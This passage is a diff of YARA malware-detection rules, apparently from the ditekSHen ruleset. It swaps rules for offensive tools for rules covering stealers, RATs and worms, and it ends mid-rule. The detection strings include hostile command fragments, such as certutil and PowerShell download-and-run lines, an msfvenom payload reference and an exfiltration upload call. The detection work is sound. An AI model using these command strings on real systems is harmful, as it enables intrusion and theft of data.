-		$dll_2 = { c7 0? 10 02 00 00 ?? 89 4? }
-		$sys_x86 = { a0 00 00 00 24 02 00 00 40 00 00 00 [0-4] b8 00 00 00 6c 02 00 00 40 00 00 00 }
-		$sys_x64 = { 88 01 00 00 3c 04 00 00 40 00 00 00 [0-4] e8 02 00 00 f8 02 00 00 40 00 00 00 }
+		$s1 = "\\DarkCoderSc\\Desktop\\Celesty Binder\\Stub\\STATIC\\Stub.pdb" ascii
+		$s2 = "DROPIN" fullword ascii wide
+		$s3 = "EXEC" fullword ascii wide
+		$s4 = "RBIND" fullword ascii wide
+		$s5 = "%LAPPDATA%" fullword ascii wide
+		$s6 = "%USERDIR%" fullword ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $* ) or 3 of ( $f* ) or all of ( $dll_* ) or any of ( $sys_* ) )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_SCN_Portscan : FILE
+rule DITEKSHEN_MALWARE_Win_Blitzgrabber : FILE
 {
 	meta:
-		description = "Detects a port scanner tool observed as second or third stage post-compromise or dropped by malware."
+		description = "Detects BlitzGrabber infostealer"
 		author = "ditekSHen"
-		id = "f270e098-17a0-5d66-acd0-c946a29919f4"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "4240527e-c2f8-5424-986a-c1616fafb9bb"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L166-L180"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10468-L10487"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ebe5eb045a250ca38a55ac43018548074e9db160d76737c36f8ae5ea268b7b10"
+		logic_hash = "8baceacf3c2af61e00b31e8106820b6f1ce2e7a9d98eaed965e698109ae08314"
 		score = 75
-		quality = 75
+		quality = 71
 		tags = "FILE"
 
 	strings:
-		$s1 = "HEAD / HTTP/1.0" fullword ascii
-		$s2 = "Result.txt" fullword ascii
-		$s3 = "Example: %s SYN " ascii
-		$s4 = "Performing Time: %d/%d/%d %d:%d:%d -->" fullword ascii
-		$s5 = "Bind On IP: %d.%d.%d.%d" fullword ascii
-		$s6 = "SYN Scan: About To Scan %" ascii
-		$s7 = "Normal Scan: About To Scan %" ascii
+		$x1 = "**BLITZED GRABBER V" wide
+		$x2 = "\\BlitzedGrabberV" ascii
+		$x3 = "Kyanite" ascii wide nocase
+		$s1 = /;\/\/(SCREENSHOT|PASSWORDS|FORKBOMB|MELTSTUB)\/\// ascii wide
+		$s2 = "KryptedWare" wide
+		$s3 = "chckcopyTemp" wide
+		$s4 = "chckscreenShot" wide
+		$s5 = "Plugin.Banking." ascii
+		$s6 = "sChromiumPswPaths" ascii
+		$s7 = ".CreateDownloadLink(" ascii
+		$s8 = "CaptureScreen()" ascii
+		$s9 = ".UploadFile(\"https://api.anonfiles.com/upload\"" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) and 3 of ( $s* ) ) or ( 7 of ( $s* ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_MEM_Mxtract : FILE
+rule DITEKSHEN_MALWARE_Win_Bagle : FILE
 {
 	meta:
-		description = "Detects mXtract, a linux-based tool that dumps memory for offensive pentration testing and can be used to scan memory for private keys, ips, and passwords using regexes."
+		description = "Detect Bagle / Beagle email worm"
 		author = "ditekSHen"
-		id = "e8c5e5b3-aa98-5f7f-9410-3efeef725f41"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "32632bdf-6cf5-5542-8e1f-70686139a465"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L182-L195"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10489-L10505"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8271722c3b8f4458d20cf874d37e87e3b1fde701205ff54f0360fb87f717fc3f"
-		score = 50
-		quality = 69
+		logic_hash = "4c3a09f10c792de1ab25001da29ea2fee84c583d49d9a5225817644aabde2dea"
+		score = 75
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "_ZN18process_operations10get_rangesEv" fullword ascii
-		$s2 = "_ZN4misc10write_dumpESsSs" fullword ascii
-		$s3 = "_ZTVNSt8__detail13_Scanner_baseE" fullword ascii
-		$s4 = "Running as root is recommended as not all PIDs will be scanned" fullword ascii
-		$s5 = "ERROR ATTACHING TO PROCESS" fullword ascii
-		$s6 = "ERROR SCANNING MEMORY RANGE" fullword ascii
+		$s1 = "SOFTWARE\\DateTime" fullword ascii
+		$s2 = "%s?p=%lu" fullword ascii
+		$s3 = "-upd" ascii
+		$s4 = "[%RAND%]" fullword ascii
+		$s5 = "MAIL FROM:<%s>" fullword ascii
+		$s6 = "RCPT TO:<%s>" fullword ascii
+		$s7 = "Message-ID: <%s%s>" fullword ascii
+		$s8 = "Content-Disposition: attachment; filename=\"%s%s\"" fullword ascii
+		$s9 = "http://www.%s" fullword ascii
 
 	condition:
-		( uint32( 0 ) == 0x464c457f or uint16( 0 ) == 0x457f ) and 3 of them
+		uint16( 0 ) == 0x5a4d and 8 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_PWS_Sniffpass : FILE
+rule DITEKSHEN_MALWARE_Win_Ragestealer : FILE
 {
 	meta:
-		description = "Detects SniffPass, a password monitoring software that listens on the network and captures passwords over POP3, IMAP4, SMTP, FTP, and HTTP."
-		author = "ditekSHen"
-		id = "b96498d4-bbe3-5cb8-9c24-91ebb51e078a"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		description = "Detect Rage / Priv8 infostealer"
+		author = "ditekShen"
+		id = "dfc1abaa-d975-5e6a-ad4d-344031b0c40c"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L197-L212"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10507-L10522"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9b56ee4bac39b4220b24e92d00076650ffe84b71a60c0213a84fcf21c6cfe4cf"
+		logic_hash = "a26b86845bcd62d4a360a8dae9cfa56b5d96ebc521f224c18a01cc0a2bd958e9"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "\\Release\\SniffPass.pdb" ascii
-		$s2 = "Password   Sniffer" fullword wide
-		$s3 = "Software\\NirSoft\\SniffPass" fullword ascii
-		$s4 = "Sniffed PasswordsCFailed to start" wide
-		$s5 = "Pwpcap.dll" fullword ascii
-		$s6 = "nmwifi.exe" fullword ascii
-		$s7 = "NmApi.dll" fullword ascii
-		$s8 = "npptools.dll" fullword ascii
+		$x1 = "\\RageStealer\\obj\\" ascii
+		$x2 = "Priv8 Stealer" wide
+		$s1 = "\\Screen.png" wide
+		$s2 = "Content-Disposition: form-data; name=\"document\"; filename=\"{1}\"" wide
+		$s3 = "NEW LOG FROM" wide
+		$s4 = "GRABBED SOFTWARE" wide
+		$s5 = "DOMAINS DETECTED" wide
+		$s6 = "snder" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) and 4 of ( $s* ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_Avbypass_Aviator : FILE
+rule DITEKSHEN_MALWARE_Win_Abubasbanditbot : FILE
 {
 	meta:
-		description = "Detects AVIator, which is a backdoor generator utility, which uses cryptographic and injection techniques in order to bypass AV detection. This was observed to bypass Win.Trojan.AZorult. This rule works for binaries and memory."
+		description = "Detects Abubasbandit Bot. Observed to drop cryptocurrency miner detected by MALWARE_Win_CoinMiner02"
 		author = "ditekSHen"
-		id = "2bddd64e-baca-58cb-ba52-27487cc4ded5"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "8bedd1f7-bd77-5f26-8665-1d23fe56100f"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L214-L240"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10524-L10541"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1fb497eec2b0cd4051b5ddd53463f1da511c0a7b72d54a0bc68736a99fdc6143"
+		logic_hash = "aae40178dadff720b42d211a025fd696eabdcc91761c6a91809f5f088c588c31"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "msfvenom -p windows/meterpreter" ascii wide
-		$s2 = "payloadBox.Text" ascii wide
-		$s3 = "APCInjectionCheckBox" ascii wide
-		$s4 = "Thread Hijacking (Shellcode Arch: x86, OS Arch: x86)" ascii wide
-		$s5 = "injectExistingApp.Text" ascii wide
-		$s6 = "Stable execution but can be traced by most AVs" ascii wide
-		$s7 = "AV/\\tor" ascii wide
-		$s8 = "AvIator.Properties.Resources" ascii wide
-		$s9 = "Select injection technique" ascii wide
-		$s10 = "threadHijacking_option" ascii wide
-		$pwsh1 = "Convert.ToByte(Payload_Encrypted_Without_delimiterChar[" ascii wide
-		$pwsh2 = "[DllImport(\"kernel32.dll\", SetLastError = true)]" ascii wide
-		$pwsh3 = "IntPtr RtlAdjustPrivilege(" ascii wide
-		$pwsh4 = /InjectShellcode\.(THREADENTRY32|CONTEXT64|WriteProcessMemory\(|CloseHandle\(|CONTEXT_FLAGS|CONTEXT\(\);|Thread32Next\()/ ascii wide
-		$pwsh5 = "= Payload_Encrypted.Split(',');" ascii wide
-		$pwsh6 = "namespace NativePayload_Reverse_tcp" ascii wide
-		$pwsh7 = "byte[] Finall_Payload = Decrypt(KEY, _X_to_Bytes);" ascii wide
-		$pwsh8 = /ConstantsAndExtCalls\.(WriteProcessMemory\(|CreateRemoteThread\()/ ascii wide
+		$x1 = "magickeycmd" ascii
+		$x2 = "chat_id" ascii
+		$x3 = "GetTempPathW" ascii
+		$x4 = "Add-MpPreference" ascii
+		$x5 = "-Command" ascii
+		$s1 = "application/x-www-form-urlencoded" ascii
+		$s2 = "gzip, deflate/index.html" ascii
+		$s3 = "powershellAdd-MpPreference -ExclusionPath" ascii
+		$s4 = "tar-xf-C" ascii
+		$s5 = "temp_file.bin" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) or 2 of ( $pwsh* ) ) ) or ( 3 of ( $s* ) or 2 of ( $pwsh* ) )
+		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 4 of ( $x* ) and 2 of ( $s* ) ) or ( ( all of ( $s* ) and 3 of ( $x* ) ) ) or ( 8 of them ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_PWS_Pwdump7 : FILE
+rule DITEKSHEN_MALWARE_Win_Oracrat : FILE
 {
 	meta:
-		description = "Detects Pwdump7 password Dumper"
+		description = "Detects OracRAT / Comfoo / Babar"
 		author = "ditekSHen"
-		id = "dc6ff544-b9de-547b-9fa8-7d0b32e9592d"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "53f3778e-56d5-5390-8ce7-82d4ede46be4"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L242-L254"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10543-L10557"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f84ab69ecc6837a826dc8726785165b8135edf51a47fb5bbaf19dc589b3032bd"
+		logic_hash = "078a5df9f3d0bb8213ea2fe28eefdb453ef186e6c1f62d3ba10cb04fca047700"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "savedump.dat" fullword ascii
-		$s2 = "Asd -_- _RegEnumKey fail!" fullword ascii
-		$s3 = "\\SAM\\" ascii
-		$s4 = "Unable to dump file %S" fullword ascii
-		$s5 = "NO PASSWORD" ascii
+		$s1 = "\\\\.\\DevCtrlKrnl" fullword ascii
+		$s2 = "SOFTWARE\\Microsoft\\IE4\\Setup" fullword ascii
+		$s3 = "\\PLUGINS" fullword ascii
+		$s4 = "\\config\\sam" fullword ascii
+		$s5 = "\\iexplore.exe\" about:blank" fullword ascii
+		$s6 = "usbak.sys" fullword ascii
+		$s7 = "userctfm" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and 4 of them ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_LTM_Sharpexec : FILE
+rule DITEKSHEN_MALWARE_Win_Phemedronestealer : FILE
 {
 	meta:
-		description = "Detects SharpExec lateral movement tool"
+		description = "Detects Phemedrone Stealer infostealer"
 		author = "ditekSHen"
-		id = "4373a052-9525-5b24-81a4-65cd68afcb6c"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "297aab1f-351c-5955-8a19-9aa2b7c94748"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L256-L275"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10559-L10580"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "17ae5c9f0b22e8ecbbbcbe052e466d00cb7b62cff423688b5138209c52f0698d"
+		logic_hash = "74e150cc971f5648f9e3f6146afba162b1a29cf2744c862b2320db52c2efa930"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "fileUploaded" fullword ascii
-		$s2 = "$7fbad126-e21c-4c4e-a9f0-613fcf585a71" fullword ascii
-		$s3 = "DESKTOP_HOOKCONTROL" fullword ascii
-		$s4 = /WINSTA_(ACCESSCLIPBOARD|WINSTA_ALL_ACCESS)/ fullword ascii
-		$s5 = /NETBIND(ADD|DISABLE|ENABLE|REMOVE)/ fullword ascii
-		$s6 = /SERVICE_(ALL_ACCESS|WIN32_OWN_PROCESS|INTERROGATE)/ fullword ascii
-		$s7 = /(Sharp|PS|smb)Exec/ fullword ascii
-		$s8 = "lpszPassword" fullword ascii
-		$s9 = "lpszDomain" fullword ascii
-		$s10 = "wmiexec" fullword ascii
-		$s11 = "\\C$\\__LegitFile" wide
-		$s12 = "LOGON32_LOGON_NEW_CREDENTIALS" fullword ascii
+		$p1 = /\{ file = \{(0|file)\}, data = \{(1|data)\} \}/ ascii wide
+		$p2 = "{ <>h__TransparentIdentifier0 = {0}, match = {1} }" wide
+		$p3 = "{ <>h__TransparentIdentifier1 = {0}, encrypted = {1} }" wide
+		$p4 = "{<>h__TransparentIdentifier0}, match = {match} }" ascii
+		$p5 = "{<>h__TransparentIdentifier1}, encrypted = {encrypted} }" ascii
+		$s1 = "<KillDebuggers>b__" ascii
+		$s2 = "<ParseExtensions>b__" ascii
+		$s3 = "<ParseDiscordTokens>b__" ascii
+		$s4 = "<IsVM>b__" ascii
+		$s5 = "<Key3Database>b__" ascii
+		$s6 = "masterPass" ascii
+		$s7 = "rootLocation" ascii
+		$s8 = "rgsServiceNames" ascii
+		$s9 = "rgsFilenames" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and 9 of them ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and ( ( all of ( $p* ) and 3 of ( $s* ) ) or ( 3 of ( $p* ) and 4 of ( $s* ) ) or ( 7 of ( $s* ) ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_PRV_Advancedrun : FILE
+rule DITEKSHEN_MALWARE_Win_WSHRAT : FILE
 {
 	meta:
-		description = "Detects NirSoft AdvancedRun privialge escalation tool"
+		description = "Detects WASHRAT"
 		author = "ditekSHen"
-		id = "c886951a-7ee9-5d38-a724-3dbba8c6ec31"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "e7940b7f-51dd-5a32-899b-64310f27bf3e"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L277-L289"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10582-L10600"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3f39e8f0629647f44a2f473d7b49a8b6adb1acd62de36420b80e7820e63854bb"
+		logic_hash = "297bfe65815637a464e2a8fc23570c6e79694ffe0467d5898b7c845f1450de95"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 
 	strings:
-		$s1 = "RunAsProcessName" fullword wide
-		$s2 = "Process ID/Name:" fullword wide
-		$s3 = "swinsta.dll" fullword wide
-		$s4 = "User of the selected process0Child of selected process (Using code injection) Specified user name and password" fullword wide
-		$s5 = "\"Current User - Allow UAC Elevation$Current User - Without UAC Elevation#Administrator (Force UAC Elevation)" fullword wide
+		$x1 = "WSH Rat v" wide
+		$x2 = "SOFTWARE\\WSHRat" wide
+		$x3 = "WSH Remote" wide nocase
+		$x4 = "WSHRAT" wide nocase
+		$s1 = "shellobj.regwrite \"HKEY_" ascii nocase
+		$s2 = "shellobj.run(\"%comspec% /c" ascii nocase
+		$s3 = "objhttpdownload.setrequestheader \"user-agent:\"," ascii nocase
+		$s4 = "WScript.CreateObject(\"Shell.Application\").ShellExecute" ascii nocase
+		$s5 = "objwmiservice.ExecQuery(\"select" ascii nocase
+		$s6 = "httpobj.open(\"post\",\"http" ascii nocase
+		$s7 = /(rdp|keylogger|get-pass|uvnc)\|http/ wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 3 of them
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or ( 1 of ( $x* ) and 1 of ( $s* ) ) or ( 6 of ( $s* ) ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_PWS_Amady : FILE
+rule DITEKSHEN_MALWARE_Win_Rustystealer : FILE
 {
 	meta:
-		description = "Detects password stealer DLL. Dropped by Amadey"
+		description = "Detect Rusty / Luca stealer"
 		author = "ditekSHen"
-		id = "6ee4e25b-bf38-5664-a08f-94e3fa92aa29"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "af39f88c-e0df-51f6-bb11-f3a7231180d0"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L291-L306"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10602-L10625"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "409374bec5f58abeb7741b41f0fc7ea1c3fdc7bbc3f0c0628db0e3aac82836d1"
+		logic_hash = "e60e66360c8f97a31e75cd90a12519f75f3a672874fc985a8da1d4d02e185b4d"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 
 	strings:
-		$s1 = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\AppData" fullword ascii
-		$s2 = "Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook" ascii
-		$s3 = "\\Mikrotik\\Winbox\\Addresses.cdb" fullword ascii
-		$s4 = "\\HostName" fullword ascii
-		$s5 = "\\Password" fullword ascii
-		$s6 = "SOFTWARE\\RealVNC\\" ascii
-		$s7 = "SOFTWARE\\TightVNC\\" ascii
-		$s8 = "cred.dll" fullword ascii
+		$s1 = "EdgeMicrosoftedgechromiumChromium7star7StaramigoAmigobraveBrave" ascii
+		$s2 = "BrowserchromeChromekometaKometaorbitumOrbitumsputnikSputniktorchTorchucozmediaUranuCozMediavivaldiVivaldiatom" ascii
+		$s3 = ".kdbx.pdf.doc.docx.xls.xlsx.ppt.pptx.odt.odp\\logscx\\sensfiles.zip" ascii
+		$s4 = "dumper.rs" ascii
+		$s5 = "decryption_core.rs" ascii
+		$s6 = "anti_emulation.rs" ascii
+		$s7 = "discord.rs" ascii
+		$s8 = /\\logscx\\(passwords_|cookies_|creditcards_)/ ascii
+		$s9 = "VirtualBoxVBoxVMWareVMCountry" ascii
+		$s10 = "New Log From ( /  )" ascii
+		$s11 = "BrowserChromeKometaOrbitumSputnikTorchUranuCozMediaVivaldiAtomMail" ascii
+		$s12 = "BrowserBraveSoftwareCentBrowserChedotChrome" ascii
+		$s13 = "ChromeKometaOrbitumSputnikTorchUranuCozMediaVivaldi" ascii
+		$s14 = "hostnameencryptedUsernameencryptedPasswordstruct" ascii
+		$s15 = "encryptedPassword" fullword ascii
+		$s16 = "AutoFill@~" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and 7 of them
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_SCR_Amady : FILE
+rule DITEKSHEN_MALWARE_Win_Simplepacker : FILE
 {
 	meta:
-		description = "Detects screenshot stealer DLL. Dropped by Amadey"
+		description = "Detects Hydrochasma packer / dropper"
 		author = "ditekSHen"
-		id = "f7660899-ed12-5765-a856-6a1c7bbd8978"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "449f7531-408f-5bda-aa64-d148c363c3e5"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L308-L320"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10627-L10638"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9e7ab39976e3219f0c6c3ce5341442343cc4baf30757cd1c9d0c2d3845fdda2f"
+		logic_hash = "e2c07947fdf53814669250052f6cceb7412aa302422f3a0b430879da638c7e6a"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "User-Agent: Uploador" fullword ascii
-		$s2 = "Content-Disposition: form-data; name=\"data\"; filename=\"" fullword ascii
-		$s3 = "WebUpload" fullword ascii
-		$s4 = "Cannot assign a %s to a %s%List does not allow duplicates ($0%x)%String" wide
-		$s5 = "scr.dll" fullword ascii
+		$p1 = "\\cloud-compiler-" ascii
+		$p2 = "\\deps\\simplepacker.pdb" ascii
+		$s1 = "uespemosarenegylmodnarodsetybdetqueue" ascii
+		$s2 = "None{\"" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 700KB and 4 of them
+		uint16( 0 ) == 0x5a4d and ( all of ( $p* ) or ( 1 of ( $p* ) and all of ( $s* ) ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_EXP_Eternalblue : FILE
+rule DITEKSHEN_MALWARE_Multi_Golangbypassav : FILE
 {
 	meta:
-		description = "Detects Windows executables containing EternalBlue explitation artifacts"
+		description = "Detect Go executables using GolangBypassAV"
 		author = "ditekSHen"
-		id = "08173a1e-2e32-5add-864a-d92ffa0a3e44"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "bd41ff7e-ce57-5bee-b6ca-9341b4c1c1fa"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L322-L342"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10679-L10689"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "63e56637118accb8c32c20e52465c027df2dbf83b3b663d316b453ce879572c8"
+		logic_hash = "842dfc7c04cbd19bbbc8b6fbf9d9925f81a21dfb713af4542ca4157d64fa5b51"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		clamav1 = "MALWARE.Win.Trojan.GolangBypassAV"
+		clamav2 = "MALWARE.Linux.Trojan.GolangBypassAV"
 
 	strings:
-		$ci1 = "CNEFileIO_" ascii wide
-		$ci2 = "coli_" ascii wide
-		$ci3 = "mainWrapper" ascii wide
-		$dp1 = "EXPLOIT_SHELLCODE" ascii wide
-		$dp2 = "ETERNALBLUE_VALIDATE_BACKDOOR" ascii wide
-		$dp3 = "ETERNALBLUE_DOUBLEPULSAR_PRESENT" ascii wide
-		$dp4 = "//service[name='smb']/port" ascii wide
-		$dp5 = /DOUBLEPULSAR_(PROTOCOL_|ARCHITECTURE_|FUNCTION_|DLL_|PROCESS_|COMMAND_|IS_64_BIT)/
-		$cm1 = "--DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll" ascii wide
-		$cm2 = "--DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll" ascii wide
-		$cm3 = "--DaveProxyPort=0 --NetworkTimeout 30 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig" ascii wide
+		$s1 = "/GolangBypassAV/gen/" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $ci* ) ) or ( 2 of ( $dp* ) ) or ( 1 of ( $dp* ) and 1 of ( $ci* ) ) or ( 1 of ( $cm* ) )
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f ) and 1 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_EXP_Weblogic : FILE
+rule DITEKSHEN_MALWARE_Win_Blankstealer : FILE
 {
 	meta:
-		description = "Detects Windows executables containing Weblogic exploits commands"
+		description = "Detects BlankStealer / BlankGrabber / Blank-c Stealer"
 		author = "ditekSHen"
-		id = "e761a968-35cb-5284-99f2-6d516ad348e3"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "19686781-4be8-56c1-b606-d8fe14dbdc48"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L344-L353"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10691-L10703"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "01855f1125b0ba87dd40f7d460440dbda2d75c8b484e842a2b2e20c089b4ab5e"
+		logic_hash = "cc0c8d3e0061d192e445ef661387360644ab428a9e9fc2480e966db96bc8264c"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		snort = "923829001"
 
 	strings:
-		$s1 = "certutil.exe -urlcache -split -f AAAAA BBBBB & cmd.exe /c BBBBB" ascii
-		$s2 = "powershell (new-object System.Net.WebClient).DownloadFile('AAAAA','BBBBB')" ascii
+		$s1 = "Blank-c" ascii
+		$s2 = "Stealer License" ascii
+		$s3 = "UID=" ascii
+		$h1 = { 42 6c 61 6e 6b 2d 63 0a 53 74 65 61 6c 65 72 20 4c 69 63 65 6e 73 65 0a 55 49 44 3d }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of them
+		( uint16( 0 ) == 0x4152 and 2 of them ) or ( all of ( $s* ) or 1 of ( $h* ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_SCN_Smbtouch : FILE
+rule DITEKSHEN_MALWARE_Linux_Getshell : FILE
 {
 	meta:
-		description = "Detects SMBTouch scanner EternalBlue, EternalChampion, EternalRomance, EternalSynergy"
+		description = "Detect GetShell Linux backdoor"
 		author = "ditekSHen"
-		id = "4e8176dd-4113-5fa8-a695-77e7169f6975"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "cccad93d-cd49-5237-96ac-66c9ac6ef532"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L376-L400"
